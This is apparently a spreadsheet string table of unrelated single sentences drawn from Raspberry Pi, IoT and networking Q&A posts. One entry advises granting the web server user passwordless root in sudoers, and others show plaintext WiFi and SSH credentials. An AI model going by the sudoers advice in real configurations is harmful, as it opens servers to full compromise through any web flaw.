    <t>I am working on a project where I will have several Raspberry Pi 3's set up, each having two barcode scanners, two passive buzzers, and two Adafruit NeoPixel Ring lights.</t>
  </si>
  <si>
    <t>For projects similar to this one, I have been able to set up a persistent workaround, such a reverse SSH tunnel.</t>
  </si>
  <si>
    <t>and then I am asked to type in the password and when I do it says "premission denied, try again" and at the end "premission denied (publickey,password)",
I tried following a lot of different solution but nothing helps.</t>
  </si>
  <si>
    <t>I have tested this code on another computer running Ubuntu 16.04, and everything worked fine, the only permissions I had to set where adding the user to the dialout group.</t>
  </si>
  <si>
    <t>Here is where i connect to the wifi and setup a new config if not configured:
And I have a chunk of code that tries to access the URL:
Here are the logs I am getting:
09-11 14:35:01.980 I/WifiRunner(19995): connectToWifi: hostName: Beanster, password: beanster1
09-11 14:35:02.014 I/WifiRunner(19995): In configured networks!!</t>
  </si>
  <si>
    <t>I just transferred it to a Raspberry Pi 3 where I ran update and upgrade, then copied over my script using Putty to connect to SSH.</t>
  </si>
  <si>
    <t>I have a simulated project using Linux with the exact same CA-signed trusted and device certificates to ensure the problem is not on the certs or the server configuration.</t>
  </si>
  <si>
    <t>This works just fine, but where I have the issue is having to set the webhook with my username: password since I have an authenticated site.</t>
  </si>
  <si>
    <t>I also granted the application the correct permissions in the package.appxmanifest:
If i go to the device portal i see on the right side the default Raspberry pi 2 audio with slidebar active.</t>
  </si>
  <si>
    <t>We have one raspberry Pi with installed Linux Mate that we are going to use to monitor the network with, one Raspberry Pi to turn on and off the alarm and a router for WLAN for the devices to connect.</t>
  </si>
  <si>
    <t>I do not care if they can see the code, I will try to centralize what I can in the cloud and seal in some way the raspberry, what worries me is that being the configuration files of firebase in the raspberry pi someone can access and use them to do something that should not, for example consult / modify / delete private data in the database of that machine or other.</t>
  </si>
  <si>
    <t>It has already some permissions in the xml
Looks like it requires to switch the port to GPS or unregister Bluetooth first... By the way I am not using bluetooth feature in the app.</t>
  </si>
  <si>
    <t>I want to get mac address of a Raspberry connected to my cellular router but I can't access to raspberry due to company restriction.</t>
  </si>
  <si>
    <t>At some point during power up it seems like the Linux Kernel somehow causes all the GPIO banks on the board to be unmapped from memory, even the physical address is unreachable (Through JTAG).</t>
  </si>
  <si>
    <t>Or you can set the permissions to allow only access to a hard-coded unix-level user group id, and modify your Android installation to add a new android permission which results in membership of the app's userid in that unix group so that it can access the port.</t>
  </si>
  <si>
    <t>Add the following after the return code checking:
in order to configure blocking I/O.</t>
  </si>
  <si>
    <t>Simple brute force method, is to write a routine as:
And in the main code:</t>
  </si>
  <si>
    <t>Also, when you exit your ssh session, the commands running in screen will continue to run, and it is very easy to install as well.</t>
  </si>
  <si>
    <t>Network registration information (CREG) output depends on modem configuration.</t>
  </si>
  <si>
    <t>You are enabling configuration by writing the  twice, but are you disabling the configuration mode by sending WriteByte(AddrPort, 0xAA); when you are done.</t>
  </si>
  <si>
    <t>Here is an other SO question with detailed answer about configuring MySQL to allow remote connection from the Raspberry Pi device to a MySQL server.</t>
  </si>
  <si>
    <t>If you're trying to remain ZigBee compliant, you'd probably pick a ZDP (ZigBee Device Profile) request (like one to query active endpoints) and send that.</t>
  </si>
  <si>
    <t>It is not used that widely because it's a pain to set up on traditional HTTP servers and messes up with many proxies, but that's not a problem for you.</t>
  </si>
  <si>
    <t>defaults to 0000) or can be easily discovered (printed/displayed on the device and physical access is possible) then security is compromised.</t>
  </si>
  <si>
    <t>Yes, you need a Bluetooth 4.0 dongle to detect iBeacons, because they are based on Bluetooth Low Energy, aka Bluetooth LE, which wasn't released until the 4.0 Bluetooth spec.</t>
  </si>
  <si>
    <t>You also either need to enable port-forwarding in ssh or set the DISPLAY variable on the Rasberry Pi to your windows host:0.</t>
  </si>
  <si>
    <t>One purpose of device drivers is to isolate/modularize such HW details, and such a program is trying to circumvent those drivers!</t>
  </si>
  <si>
    <t>I assume that QEMU do not capture your special keys combination because your window manager do it before passing to QEMU.</t>
  </si>
  <si>
    <t>USB access on OSX, found that Chrome does not gain access to the USB device until the native client application (using hidapi) is running and recognize the device.</t>
  </si>
  <si>
    <t>You wouldn't want to set the time again and again, so you can do something like this:
Also, just as a best practice, you should use try except blocks to safely exit the code.</t>
  </si>
  <si>
    <t>To address your issue ("Access Denied") it seems like you're probably not launching PowerShell with administrative privileges, and may need to run  as well.</t>
  </si>
  <si>
    <t>sudo raspi-config will let you ensure you enabled your camera, or use the Menu, Preferences to see if its enabled.</t>
  </si>
  <si>
    <t>If the router acts as DHCP server and the modem, connected to the router, provides internet access it's understandable that the device won't have internet access if you disconnect the two.</t>
  </si>
  <si>
    <t>State Machine
The Z-Wave state machine is the method used by Z-Wave to enable devices to be polled.</t>
  </si>
  <si>
    <t>Try installing the new signed drivers linked here: https://blog.sengotta.net/signed-mac-os-driver-for-winchiphead-ch340-serial-bridge/</t>
  </si>
  <si>
    <t>You don't say what kind of public access you're expecting, but without access to the main router you just need to signup for a dynamic DNS service with a client-based updating tool.</t>
  </si>
  <si>
    <t>SSH can still be turned on or off from the Raspberry Pi Configuration
  application or raspi-config; this is simply an additional way to turn
  it on if you cant easily run either of those applications.</t>
  </si>
  <si>
    <t>To then enable sshd permanently you can run raspi-config and select to start SSHd.</t>
  </si>
  <si>
    <t>Auto-acknowledge also can be an issue (note that when auto-ack is enabled, CRC can't be disabled as it is used to ensure transmission acknowledgement in this mode).</t>
  </si>
  <si>
    <t>It is a very fast "data structure server" - meaning you can use it to implement hashes, sets, queues etc.</t>
  </si>
  <si>
    <t>The function of the restriction 'Disallow configuring WiFi' is disallowing user changing the WiFi access points.</t>
  </si>
  <si>
    <t>The  permission is a dangerous permission that would typically require granting at runtime by the user on standard Android.</t>
  </si>
  <si>
    <t>You can get more knowleage about how to check internet connectivity type in Universal Windows Platform from this topic
.</t>
  </si>
  <si>
    <t>Then set the executable bit with this command: 
chmod +x /home/pi/path/to/myprogram.py
Edit: That error looks like you are trying to run your program remotely, via ssh or something.</t>
  </si>
  <si>
    <t>If you are deploying software in a shared hosting
environment, you may not be permitted to use WebSockets.</t>
  </si>
  <si>
    <t>In one of the sections (don't remember the name of the section), it allows you to mention which TLS/SSL version to allow incoming requests from.</t>
  </si>
  <si>
    <t>Active FTP requires a connection to a random data port that might be being blocked by a firewall.</t>
  </si>
  <si>
    <t>The better option is to publish your updated firmware to an externally available HTTP server and change your ESP OTA codde to check that external server for updates.</t>
  </si>
  <si>
    <t>The ssh tunnel uses strong encryption methods to pass the traffic over the untrusted network ( yours, or perhaps any network for some traffic ).</t>
  </si>
  <si>
    <t>Calls to the public https address are sent to a service running locally on your device, and you can handle it accordingly.</t>
  </si>
  <si>
    <t>You need to add correct flag after setting can_id:
Or for example:
instead of
use
frame.can_id = 0x0000FEE9U | CAN_EFF_FLAG ;
Here U signifies, that your integer literal is unsigned.</t>
  </si>
  <si>
    <t>I'm assuming you are verified your physical connection and providing proper voltage supply.</t>
  </si>
  <si>
    <t>Assuming that your laptop can reach the Raspberry Pi normally, such as through SSH, then I suspect that Flask is only listening locally.</t>
  </si>
  <si>
    <t>tramp stands for Transparent Remote Access - Multiple Protocols, an Emacs module that allows remote editing of files.</t>
  </si>
  <si>
    <t>character-properties are a set of attributes supplied by the Unicode Standard.</t>
  </si>
  <si>
    <t>Jailkit is a set of utilities to limit user accounts to specific files using chroot() and or specific commands.</t>
  </si>
  <si>
    <t>As per the Android Doc - Android 7.0 runs in a secure, Direct Boot mode when the device has been powered on but the user has not unlocked the device.</t>
  </si>
  <si>
    <t>It is essentially a generalization of a unique constraint that allows a more fine grained definition of "unique"
This can be used to e.g.</t>
  </si>
  <si>
    <t>Requesters publish HITs (Human Intelligence Tasks) that are performed by Workers.</t>
  </si>
  <si>
    <t>Client-side JavaScript library to work with remote data exposed over HTTP Web APIs</t>
  </si>
  <si>
    <t>SOSEX is another debugger extension targeted at the native debuggers and managed code debugging.</t>
  </si>
  <si>
    <t>Clickjacking is possible because seemingly harmless features of HTML web pages can be employed to perform unexpected actions.</t>
  </si>
  <si>
    <t xml:space="preserve"> is a command line utility to manage flock advisory locks - i.e., they're a convention instead of a hard restriction.</t>
  </si>
  <si>
    <t>If the request requires user authorization, set the account property to an ACAccount object.</t>
  </si>
  <si>
    <t>Moreover, selectively encrypting files is
risky since one should ensure that no replica of sensitive data remains unencrypted
(e.g., in log files, temporary files, etc).</t>
  </si>
  <si>
    <t>CryptoAPI works with a number of CSPs (Cryptographic Service Providers) installed on the machine.</t>
  </si>
  <si>
    <t>This means that the system is very robust against errors and portable across filesystems and even across different computers accessing the database via NFS or other shared filesystems.</t>
  </si>
  <si>
    <t>On Android tablets, users can now create restricted profiles based on the primary user.</t>
  </si>
  <si>
    <t>Administrators have the ability to configure NIS to serve password data to outside processes to authenticate users using various versions of the Unix crypt hash algorithms.</t>
  </si>
  <si>
    <t>Microsoft Terminal Services Client (mstsc) allows a user to remotely log into a networked computer running the terminal services server.</t>
  </si>
  <si>
    <t>It provides no facility for authorization (ensuring whether a user can or cannot perform the operation implied by the request).</t>
  </si>
  <si>
    <t>As part of the association process, a wireless client must have the same SSID as the one put in the access point or it will not be permitted to join the BSS.</t>
  </si>
  <si>
    <t>The returned address is not guaranteed to be usable directly as a virtual address.</t>
  </si>
  <si>
    <t>Using the Basic Auth mechanism, it retrieves a username/password pair from the browser and checks them against a Kerberos server as set up by your particular organization.</t>
  </si>
  <si>
    <t>Users who verify your signature can grant your JAR-bundled software security privileges that it wouldn't ordinarily have.</t>
  </si>
  <si>
    <t>Security enhancements to limit the attack surface by restricting default remote access to the admin portal.</t>
  </si>
  <si>
    <t>Transferring log messages using the TCP protocol ensures that no messages are lost.</t>
  </si>
  <si>
    <t>If the result is null, you should not use the intent and, if possible, you should disable the feature that issues the intent.</t>
  </si>
  <si>
    <t>Rocket is an alternative to the docker runtime, designed for server environments with the most rigorous security and production requirements.</t>
  </si>
  <si>
    <t>Taint checking asumes that any variable that can be modified by an external user poses a potential security risk.</t>
  </si>
  <si>
    <t>It uses standard calls from the system's libraries to retrieve and set account information as well as authentication.</t>
  </si>
  <si>
    <t>They also set the security policies and other environment policies that govern mobile deployment.</t>
  </si>
  <si>
    <t>It is designed for fewer patch and update events, faster restarts, better resource utilization and tighter security.</t>
  </si>
  <si>
    <t>Thanks to an elaborate authentication feature, the exam system can verify that a particular, unaltered SEB version and the correct exam settings are used for an examination.</t>
  </si>
  <si>
    <t>such as title and vendor
Download and update behavior
The security environment requested by the app.</t>
  </si>
  <si>
    <t>Wizards : Several wizards are provided, including wizards to quickly generate Hibernate configuration (cfg.xml) files, and Hibernate console configurations.</t>
  </si>
  <si>
    <t>UDP uses a simple transmission model without implicit handshaking dialogues for providing reliability, ordering, or data integrity.</t>
  </si>
  <si>
    <t>One must be able have access to the MySQL server machine, and permissions to operate on files as the mysql user in order to access and manage the dump files.</t>
  </si>
  <si>
    <t>Intent Extras allow you to transmit a wide variety of data without having to resort to complex threading or security access levels.</t>
  </si>
  <si>
    <t>OllyDbg operates in Ring3, or userland, rendering it unable to debug device drivers and kernel components.</t>
  </si>
  <si>
    <t>It is a web router and firewall that allows you to integrate web applications with arbitrary back-end systems.</t>
  </si>
  <si>
    <t>Webmin removes the need to manually edit Unix configuration files like /etc/passwd, and lets you manage a system from the console or remotely.</t>
  </si>
  <si>
    <t>I have been researching them for a while and am interested in conducting a small scale attack against a victim server with no security (I'll most likely set this up using nginx or apache) running on a Raspberry Pi.</t>
  </si>
  <si>
    <t>If I directly put nginx ip and port in browser proxy configuration it works, but i want define it in router.</t>
  </si>
  <si>
    <t>I know this is possible with Device Portal REST api, but this requires the device admin password which is not suitable for production scenarios.</t>
  </si>
  <si>
    <t>It seems that ssh to eth0 triggers some system event which restarts iptable and my rule starts working.</t>
  </si>
  <si>
    <t>For instance:
AT+QIREGAPP="gprs.oi.com.br","",""
Please update your commands as above (including APN, username, and password in both CGDCONT and QIREGAPP) and I'll update the answer accordingly.</t>
  </si>
  <si>
    <t>I am trying to ssh to rpi3 via bluetooth while rpi3 is associated with a device that provide its own AP for a one-to-one connection and this cuts off the bluetooth communication.</t>
  </si>
  <si>
    <t>Devices perform a join-procedure with the network, during which a
  dynamic DevAddr is assigned and security keys are negotiated with the
  device.</t>
  </si>
  <si>
    <t>configuration management, service discovery, circuit breaker, intelligent routing, micro-proxy, control bus, global locks, leadership election, distributed sessions).</t>
  </si>
  <si>
    <t>Install them to any machine in minutes without worrying about running and securing your own repository server.</t>
  </si>
  <si>
    <t>I managed to install mono 4.0.1 and Lighttpd as the web server, and I was able to get this default MVC WebApplication (with no authentication) run on the Raspberry machine.</t>
  </si>
  <si>
    <t>I dont do remote access; my keyboard and monitor are directly connected to the Raspberry.</t>
  </si>
  <si>
    <t>The response to the  command will give you a list of all Bluetooth LE advertisements scanned.</t>
  </si>
  <si>
    <t>Data Validation Controls  ensures that all transactions are properly
valued.</t>
  </si>
  <si>
    <t>The pi setup is straight forward and for me to connect to it I used raspi-config to enable SSH and are able to connect to the device without a glitch.</t>
  </si>
  <si>
    <t>Afterwards, when installing phpMyAdmin, using:
apt-get install phpmyadmin -y
Again, I was not prompted to provide a password.</t>
  </si>
  <si>
    <t>I am trying to make a combination lock using an Arduino, a keypad and a Servo but I have come across an obstacle.</t>
  </si>
  <si>
    <t>But I am not sure if it is going to be shutdown within 30 secs after writing the data safely to sql db.</t>
  </si>
  <si>
    <t>EDIT
I changed the permissions setting for security purposes.</t>
  </si>
  <si>
    <t>Confirm the device type is correctly specified in your node configuration.</t>
  </si>
  <si>
    <t>I made mine "chirp" like the alarm on a car security system.</t>
  </si>
  <si>
    <t>You must use signed value in last 2 bytes of data:
To spin backwards:
To spin forwards:</t>
  </si>
  <si>
    <t>For this reason, the file is hidden and has the permission bits set to 0600.</t>
  </si>
  <si>
    <t>First, you should make sure that the ssh daemon is installed properly on your RP.</t>
  </si>
  <si>
    <t>For security reasons you are not allowed to access arbitrary folders.</t>
  </si>
  <si>
    <t>In Android development, a PendingIntent is a token one application grants to another to allow the execution of certain operations.</t>
  </si>
  <si>
    <t>The kernel to be debugged runs on the test machine.</t>
  </si>
  <si>
    <t>Unfortunately the plot method for dendrograms plots directly to a plot device without exposing the data.</t>
  </si>
  <si>
    <t>inside an organisation's firewall as opposed to on the Internet.</t>
  </si>
  <si>
    <t>I just need to be able to access it and protect it from being wiped during a reset.</t>
  </si>
  <si>
    <t>Tip: this is some kind of DDNS, but with network discovery purposes.</t>
  </si>
  <si>
    <t>At present I am trying to configure sites-enabled/default-ssl.conf files as follows:
I'm very new to Server set-ups and have spent a large amount of time web searching and trying many different suggested methods.</t>
  </si>
  <si>
    <t>I have added my .swf and file path (and many variations) to the Global Security settings page on 'Macromedia' site..  (didnt change anything)
I have tried using Security.loadPolicyFile()...  and it didnt seem to change anything..
Do I need to perhaps attempt a 'self signed certificate' install on my LAMP install on my RPi?</t>
  </si>
  <si>
    <t>Check out this command below:
sudo grep sshd /var/log/auth.log
the sudo command stands for superuser do it is an administrator keyword
grep: allows you to search through text 
sshd: you know what that is
then the path to where we are searching for is the logfiles for authentication 
Check out the links below also:
https://www.ssh.com/ssh/config/
https://www.raspberrypi.org/documentation/remote-access/ssh/
*Also, make sure you have SSH enabled on the raspberry pi
Sorry I'm not more help I haven't done this on a pi yet.</t>
  </si>
  <si>
    <t>Another option, and probably more elegant as having custom fields in your certificate might expose information that'd better remain private, would be to maintain the mappings between the registrationId, customerId, customerId, etc.</t>
  </si>
  <si>
    <t>Standards and cryptographic software and hardware to perform encryption are widely available, but successfully using encryption to ensure security may be a challenging problem.</t>
  </si>
  <si>
    <t>I installed mender from source on apalis imx6, I am trying to run it like :
mender -daemon
It starts up fine, then gives me the following errors :
I have added the certificate generated using the keygen provided in etc/mender/server.crt and started up docker server using ./up
I don't see my device under devices either.</t>
  </si>
  <si>
    <t>If you wish to provide a confirmation things get tricky because MessageDialog isn't currently supported on IoT Core: https://developer.microsoft.com/en-us/windows/iot/win10/unavailableapis
As an alternative, others have proposed creating your own UserControl or using a Flyout to mimic the experience.</t>
  </si>
  <si>
    <t>ngrok provides https tunnels from the internet to local machines with the ability to capture and replay traffic.</t>
  </si>
  <si>
    <t>This parameter can be combined with
-s.
-f : Displays fully qualified domain names  for foreign addresses (only available on Windows Vista and newer operating
systems).</t>
  </si>
  <si>
    <t>By default, the WinRM firewall exception fo
public profiles limits access to remote computers within the same local
subnet.</t>
  </si>
  <si>
    <t>For setting up the module I do the following:
So I wait till my module gets the networks, and then I set the PIN-Number so my SimCard gets unlocked.</t>
  </si>
  <si>
    <t>Instructions on backing up and editing sudoers file :http://raspbypi.com/enabling-the-sudo-command-for-a-new-user/
sudo visudo
add this at the end of the file www-data ALL=(ALL) NOPASSWD: ALL 
Press CTRL+X and press yes
login and logout to ensure permission is now set.</t>
  </si>
  <si>
    <t>When using the Safari iPhone browser to look at the counter on the laptop, the counter increments and the stored cookie is .2kb, but when looking at the same code running on the Raspberry, the counter never increments and the cookie is 0 bytes.</t>
  </si>
  <si>
    <t>By
default, the WinRM firewall exception for public profiles limits access to remote computers within the same local
subnet.</t>
  </si>
  <si>
    <t>I would like to implement access to a remote Raspberry which is behind a NAT/Firewall (dynamic IP) by using websockets and therefore a Web Client.</t>
  </si>
  <si>
    <t>I have a online project working fine, but a customer ask me if it was possible to sell him the project but in a offline environment, mainly because he has trust issues with internet.</t>
  </si>
  <si>
    <t>When I install an app via adb the screen stays black and no suspicious log message shows up.</t>
  </si>
  <si>
    <t>");
    return;
  }
  pihome.setAuthorization(username, password);
  Serial.println("Set authorization");
  //If a connection is formed, send get request to device endpoint.</t>
  </si>
  <si>
    <t>It does great for hours, sometimes even a day, but I keep getting these seemingly random "Access is Denied" messages which terminate the program.</t>
  </si>
  <si>
    <t>That said router is connected to internet through its cable
I wish to determine if the raspberry has internet connection or not in order to change it's data source if needed.</t>
  </si>
  <si>
    <t>I try two of my routers, change wifi channels , passwords, upload working binary that works and connects to wifi.</t>
  </si>
  <si>
    <t>However I also set AT+TYPE3 and Set a custom pin using AT+PASS123456 in first device and when connecting to this from phone it asks for a password.</t>
  </si>
  <si>
    <t>When the wireless router lost internet connection, iot device will not get notified immediately about the disconnection.</t>
  </si>
  <si>
    <t>This prevents unwanted traffic from reaching the custom (and possibly vulnerable) command server.</t>
  </si>
  <si>
    <t>Logging in through SSH will use your local keyboard setting so you should be able to set the default keyboard back to wht it was.</t>
  </si>
  <si>
    <t>SSH uses public-key
  cryptography to authenticate the remote computer and allow the remote
  computer to authenticate the user, if necessary.</t>
  </si>
  <si>
    <t>How to connect the Raspberry Pi to a Hidden Network:
http://www.techiesparks.com/2014/12/04/connect-raspberry-pi-wireless-network-openhidden/992
Command prompt command to find out WiFi Password= wpa_passphrase RouterName password
So for example= wpa_passphrase Txlnt1 703282231360
So after typing in wpa_passphrase "Router" 'password', my password= psk="2862bf336b704145a702dc31af7a1bc353b0f4d3d1c2927344e2426027723054"
My "/etc/wpa_supplicant/wpa_supplicant.conf" Fie:
My "/etc/network/interfaces" File:</t>
  </si>
  <si>
    <t>If you're logging in using a remote connection, you should be able to set up ssh key logins to the Pi, and under home directory of the user account which you'll be logging in as, just edit .</t>
  </si>
  <si>
    <t>Another issue in your scenario is that any cast device requires internet connectivity; without one, such device will not boot up completely and won't be useful.</t>
  </si>
  <si>
    <t>As for the 'Missing Authentication Token' message you noticed when trying to access the endpoint from your browser, you can safely ignore it.</t>
  </si>
  <si>
    <t>It requires the path to your key:
or leave it out completely, if it is in the default location:
sshpass -p passphrase scp pi@ipadress:/home/pi/filename /home/flash/mylog.log</t>
  </si>
  <si>
    <t>Note that you need to start adbd as root in order to pass a permission check:
Convert the raw binary to image by the tool you prefer.</t>
  </si>
  <si>
    <t>It must be a human initiated action which requires the user to be signed in to Bluemix and IoT Platform to obtain the service credentials from Bluemix.</t>
  </si>
  <si>
    <t>Need to do initialization
- the BT pins:
 5v to 5v  arduino
 GND to GND arduino
 TX to RX arduino
 RX to TX arduino 
 solder pin 34 of BT  with wire and connected to any digital pin of arduino
 then, in void setup  set digital pin to low, and after delay, 1 sec, set pin to high
this way will let you get in AT command.</t>
  </si>
  <si>
    <t>If I am understanding this correctly you appear to have addressed connectivity between the nodemcu device and the internet (beyond your router) by calling an external site.</t>
  </si>
  <si>
    <t>On a consumer product, only those pins required by the target application are likely to be exposed, and even then they may not be accessible if they are connected to BGA devices.</t>
  </si>
  <si>
    <t>As long as you send complete lines of data from each router, you shouldn't see corrupted CSV records on the coordinator.</t>
  </si>
  <si>
    <t>I have a Raspberry Pi 3 (Model B) running Raspbian 9 (Stretch),
this network interface configuration worked for me to connect to my routers hidden SSID (TP Link Archer 2600, secured with WPA/WPA-2 Personal).</t>
  </si>
  <si>
    <t>You can expose all the devices on your host using the --privileged flag, which disables most of the protections that Docker puts in place (i.e., it should be used with caution).</t>
  </si>
  <si>
    <t>I have some networked hardware that is not tolerant of the public IP address changing (and requires a reboot if it does).</t>
  </si>
  <si>
    <t>You can give your Arduino some additional protection by placing a 10kOhm resistor between the Arduino analog pin you wish to use and the positive voltage output of the power supply.</t>
  </si>
  <si>
    <t>I think that their user interface typically does expose all of the valid commands, so it probably won't work to try sending them manually (as you discovered).</t>
  </si>
  <si>
    <t>ref: https://www.raspberrypi.org/documentation/configuration/wireless/headless.md
To discover the IP of your raspberry, use your browser to connnect to your router (usually is http://192.168.0.1) and ask a list of active connected devices, you should be able to identify the raspberry.</t>
  </si>
  <si>
    <t>It  is intended to be a convenient alternative to scp, allowing to transfer files without  having  to  open another session and re-authenticate oneself.</t>
  </si>
  <si>
    <t>An audio fingerprint is a hash code of some digital audio, with the additional properties that it is tolerant of noise and distortion,  and can be reproduced without synchronizing with the start of the audio.</t>
  </si>
  <si>
    <t>DMZ (Demilitarized Zone) is a physical or logical subnetwork that contains and exposes an organization's external-facing services to a larger and untrusted network, usually the Internet.</t>
  </si>
  <si>
    <t>In addition to it's online services, Best Buy has developed an API for users to retrieve information from their site.</t>
  </si>
  <si>
    <t>It is often referred to as a data structure server since keys can contain strings, hashes, lists, sets and sorted sets.</t>
  </si>
  <si>
    <t>A lexical scanner, also known as a lexical analyzer or tokenizer, is a program which performs pattern-matching on text in order to produce tokens for a parser.</t>
  </si>
  <si>
    <t>Since then, some platforms are starting to provide remote
debugger capabilities, as part of their platform tool set.</t>
  </si>
  <si>
    <t>It  is intended to be a convenient alternative to scp, allowing to transfer files without having to open another session and re-authenticate oneself.</t>
  </si>
  <si>
    <t>It is intended to be a replacement for standard , window.confirm(), and window.prompt() methods.</t>
  </si>
  <si>
    <t>This part of the process is called authorization, and it means that the system is checking to see if you have privileges to perform a certain action.</t>
  </si>
  <si>
    <t>Also, in order to maintain record locks, a persistent connection to the database server is required.</t>
  </si>
  <si>
    <t>AppLocker is a new feature in Windows 7 and Windows Server 2008 R2 that allows you to specify which users or groups can run particular applications in your organization based on unique identities of files.</t>
  </si>
  <si>
    <t>Some network-provided handsets have carrier-specific software that may deny the inbuilt tethering ability normally available on the handset, or only enable it if the subscriber pays an additional fee.</t>
  </si>
  <si>
    <t>Action: Run "lsnrctl services" to ensure that the instance(s) have registered with the listener, and are accepting connections.</t>
  </si>
  <si>
    <t>Access to a Yammer network is determined by a user's Internet domain so that only individuals with appropriate email addresses may join their respective networks.</t>
  </si>
  <si>
    <t>I am using the RIOT Games APi and using the example code that is provided however the console displays:
I'm not so sure, I wrote a different code that requests user ID which works perfectly fine.</t>
  </si>
  <si>
    <t>I just installed mosquitto on my rpi and registered my devices and gateway in Watson IoT Platform using this tutorial: https://developer.ibm.com/recipes/tutorials/using-mosquitto-as-a-gateway-for-watson-iot/
Mosquitto works fine local mode.</t>
  </si>
  <si>
    <t>Only power and ethernet cables are connected)
When I take hair dryer to warm it up and I blow hot air for ~1 minute RPI can reboot without any problems.</t>
  </si>
  <si>
    <t>I'm creating a pipeline that should check out the repository, configured like this with correct git credentials.</t>
  </si>
  <si>
    <t>I have installed the 2017-11-29-raspbian-stretch on raspberry 3b, and created a file named ssh in boot directory in SD card, then connected mac with raspberry with an Ethernet cable, I have also turned on Sharing from wifi to Ethernet on mac, but when I wanted connect with raspberry with ssh ssh pi@192.168.2.255 it says "ssh: connect to host 192.168.2.255 port 22: Permission denied".</t>
  </si>
  <si>
    <t>Testing SMB configuration with smbclient
I downloaded smbclient to test the SMB protocol just to rule out the possibility of network configuration errors causing this problem.</t>
  </si>
  <si>
    <t>I will not be able to type anything (to grant permissions) since there is no keyboard or mouse or web-browser but I can write a simple configuration file with my credentials.</t>
  </si>
  <si>
    <t>Then these UDP packets are recieved by an app on a smartphone so the identifier-number can be extracted and used on the smartphone.</t>
  </si>
  <si>
    <t>On the global internet these addresses are "not routable", which means no-one else can get to your 192.168.2.1 (because there are lots of other copies of that address behind other home routers, and there would be no way to know which one to use).</t>
  </si>
  <si>
    <t>If the router ACK at the application layer doesn't contain any additional information, you can potentially eliminate it to reduce network traffic.</t>
  </si>
  <si>
    <t>Appears if you perform your script with sudo or adjust the permissions, you can perform the following:
This Guide seems very helpful:
http://www.xodustech.com/guides/raspberry-pi-php-gpio</t>
  </si>
  <si>
    <t>Looking a little bit deeper showed that in my configuration the key exchange seems to be a problem: setting wpa_group_rekey=10 in hostapd.conf increases probability of the deauth requests.</t>
  </si>
  <si>
    <t>Potentially router software update or change in security settings have caused the detection to break down?</t>
  </si>
  <si>
    <t>Set error reporting and run:
If it prints out user who is not sudoer, set correct permissions to allow your .py script execution by that user.</t>
  </si>
  <si>
    <t>It would be hard to hack because I filter incoming numbers and restrict authority to just two numbers.</t>
  </si>
  <si>
    <t>Use TPM for security/credentials as this extracts connectivity credentials from the device, once it is configured on the device, without needing any device specific coding (ie no connection string).</t>
  </si>
  <si>
    <t>And that's not something you can do on PC-style hardware, unless you disable all debugging possibilities and ensure you have safe booting capability.</t>
  </si>
  <si>
    <t>Symantec certificates won't work from Chrome 70
AWS just posted a solution:
IoT endpoints can't be changed automatically like other AWS services  because IoT devices need to be updated too.</t>
  </si>
  <si>
    <t>Update the fields with
  the username and password values that you copied from your Azure
  container registry."</t>
  </si>
  <si>
    <t>(https://cloud.google.com/iot/docs/how-tos/http-bridge)
To establish a connection to HTTP Bridge you have to prepare a private key signed JWT for authentication.</t>
  </si>
  <si>
    <t>Network adapter settings on Windows
If your machine is managed within an enterprise, then I know of at least a couple of adapter plugins that will interfere with unusual network packets.</t>
  </si>
  <si>
    <t>zssh (Zmodem SSH) is a program for interactively transferring files to a remote machine while using the secure  shell (ssh).</t>
  </si>
  <si>
    <t>The mutual exclusion requirement is one of the most basic in an operating system; without it the OS cannot share resources safely.</t>
  </si>
  <si>
    <t>Also, depending on the access level of a user or the forum set-up, a posted message might need to be approved by a moderator before it becomes visible.</t>
  </si>
  <si>
    <t>The common language runtime retrieves these attributes and informs the runtime security system about the required permissions.</t>
  </si>
  <si>
    <t>Otherwise, the remote computer cannot authenticate the user account specified and it cannot verify that the account is a member of the Administrators group.</t>
  </si>
  <si>
    <t>The job of the firewall is to determine whether or not the user needs to be authenticated, and if they do, to send a response back to the user initiating the authentication process.</t>
  </si>
  <si>
    <t>In order to use LayerKit you must be a registered developer with a provisioned application identifier and have configured a backend system to act as an identity provider for your client applications.</t>
  </si>
  <si>
    <t>This is where you will set up your webhook, retrieve your page access token and submit your app for approval.</t>
  </si>
  <si>
    <t>Ability to restrict licenses of installed modules and a means for outputting license information.</t>
  </si>
  <si>
    <t>Android apps do not require the extra device registration step prior to signing.</t>
  </si>
  <si>
    <t>Changing the firmware of a device may rarely or never be done during its economic lifetime; some firmware memory devices are permanently installed and cannot be changed after manufacture.</t>
  </si>
  <si>
    <t>A common
usage is to monitor network traffic by polling a network
switch or router interface via SNMP.</t>
  </si>
  <si>
    <t>Setting up the repositories I get this output:
And when trying to run a sudo apt-get update I get this error:
Anyone had this problem adding a public key?</t>
  </si>
  <si>
    <t>Alternatively, if third-party libraries are acceptable, you might be interested in Guava's UnsignedBytes utility class.</t>
  </si>
  <si>
    <t>It turned out that it is actually possible to reenable advertising automatically, but it only seems to work with selected bluez/kernel combinations.</t>
  </si>
  <si>
    <t>That can be avoided in hardware or even in software by explicitly disabling RST signal on open.</t>
  </si>
  <si>
    <t>Each side of the device twins has a responsibility to make a valid state transmission.</t>
  </si>
  <si>
    <t>The sandbox generally aims to restrict access to shared components of Windows.</t>
  </si>
  <si>
    <t>Easy way would be use Git bash and generate the certificate with bash commands on Windows platform.</t>
  </si>
  <si>
    <t>Thai concept on my project is that windows phone and intel galileo will exchange string messages over bluetooth.</t>
  </si>
  <si>
    <t>Guide here:
https://gitlab.com/gitlab-org/gitlab-ci-multi-runner/blob/master/docs/install/linux-manually.md
You need to have an account and be signed in in order to be able to read the guide.</t>
  </si>
  <si>
    <t>The idea of the secure element is that the private key can't be compromised so doesn't need rotating (read: can't rotate).</t>
  </si>
  <si>
    <t>GNU Screen can be thought of as a text version of graphical window managers, or as a way of putting virtual terminals into any login session.</t>
  </si>
  <si>
    <t>But running it on the Raspberry Pieither remotely via ssh or directly off the PiJinja2 suddenly forgets how to deal with numbers.</t>
  </si>
  <si>
    <t>I want to find out if upon clicking on the pivotitem using pointerpressed is suitable to trigger the dialog for password?</t>
  </si>
  <si>
    <t>The purpose is to be able to configure the credentials for the home network, to which the STA interface would ultimately connect.</t>
  </si>
  <si>
    <t>Some devices might need some obscure handling of the Slave Select pin in order to work.</t>
  </si>
  <si>
    <t>Once the firewall is open it won't take long before you start to see bots trying to log in.</t>
  </si>
  <si>
    <t>Direct receivers are responsible for their own coordination of access to partitions within a consumer group.</t>
  </si>
  <si>
    <t>You can easily launch an install prompt:
However, you cannot install  without user's explicit permission.</t>
  </si>
  <si>
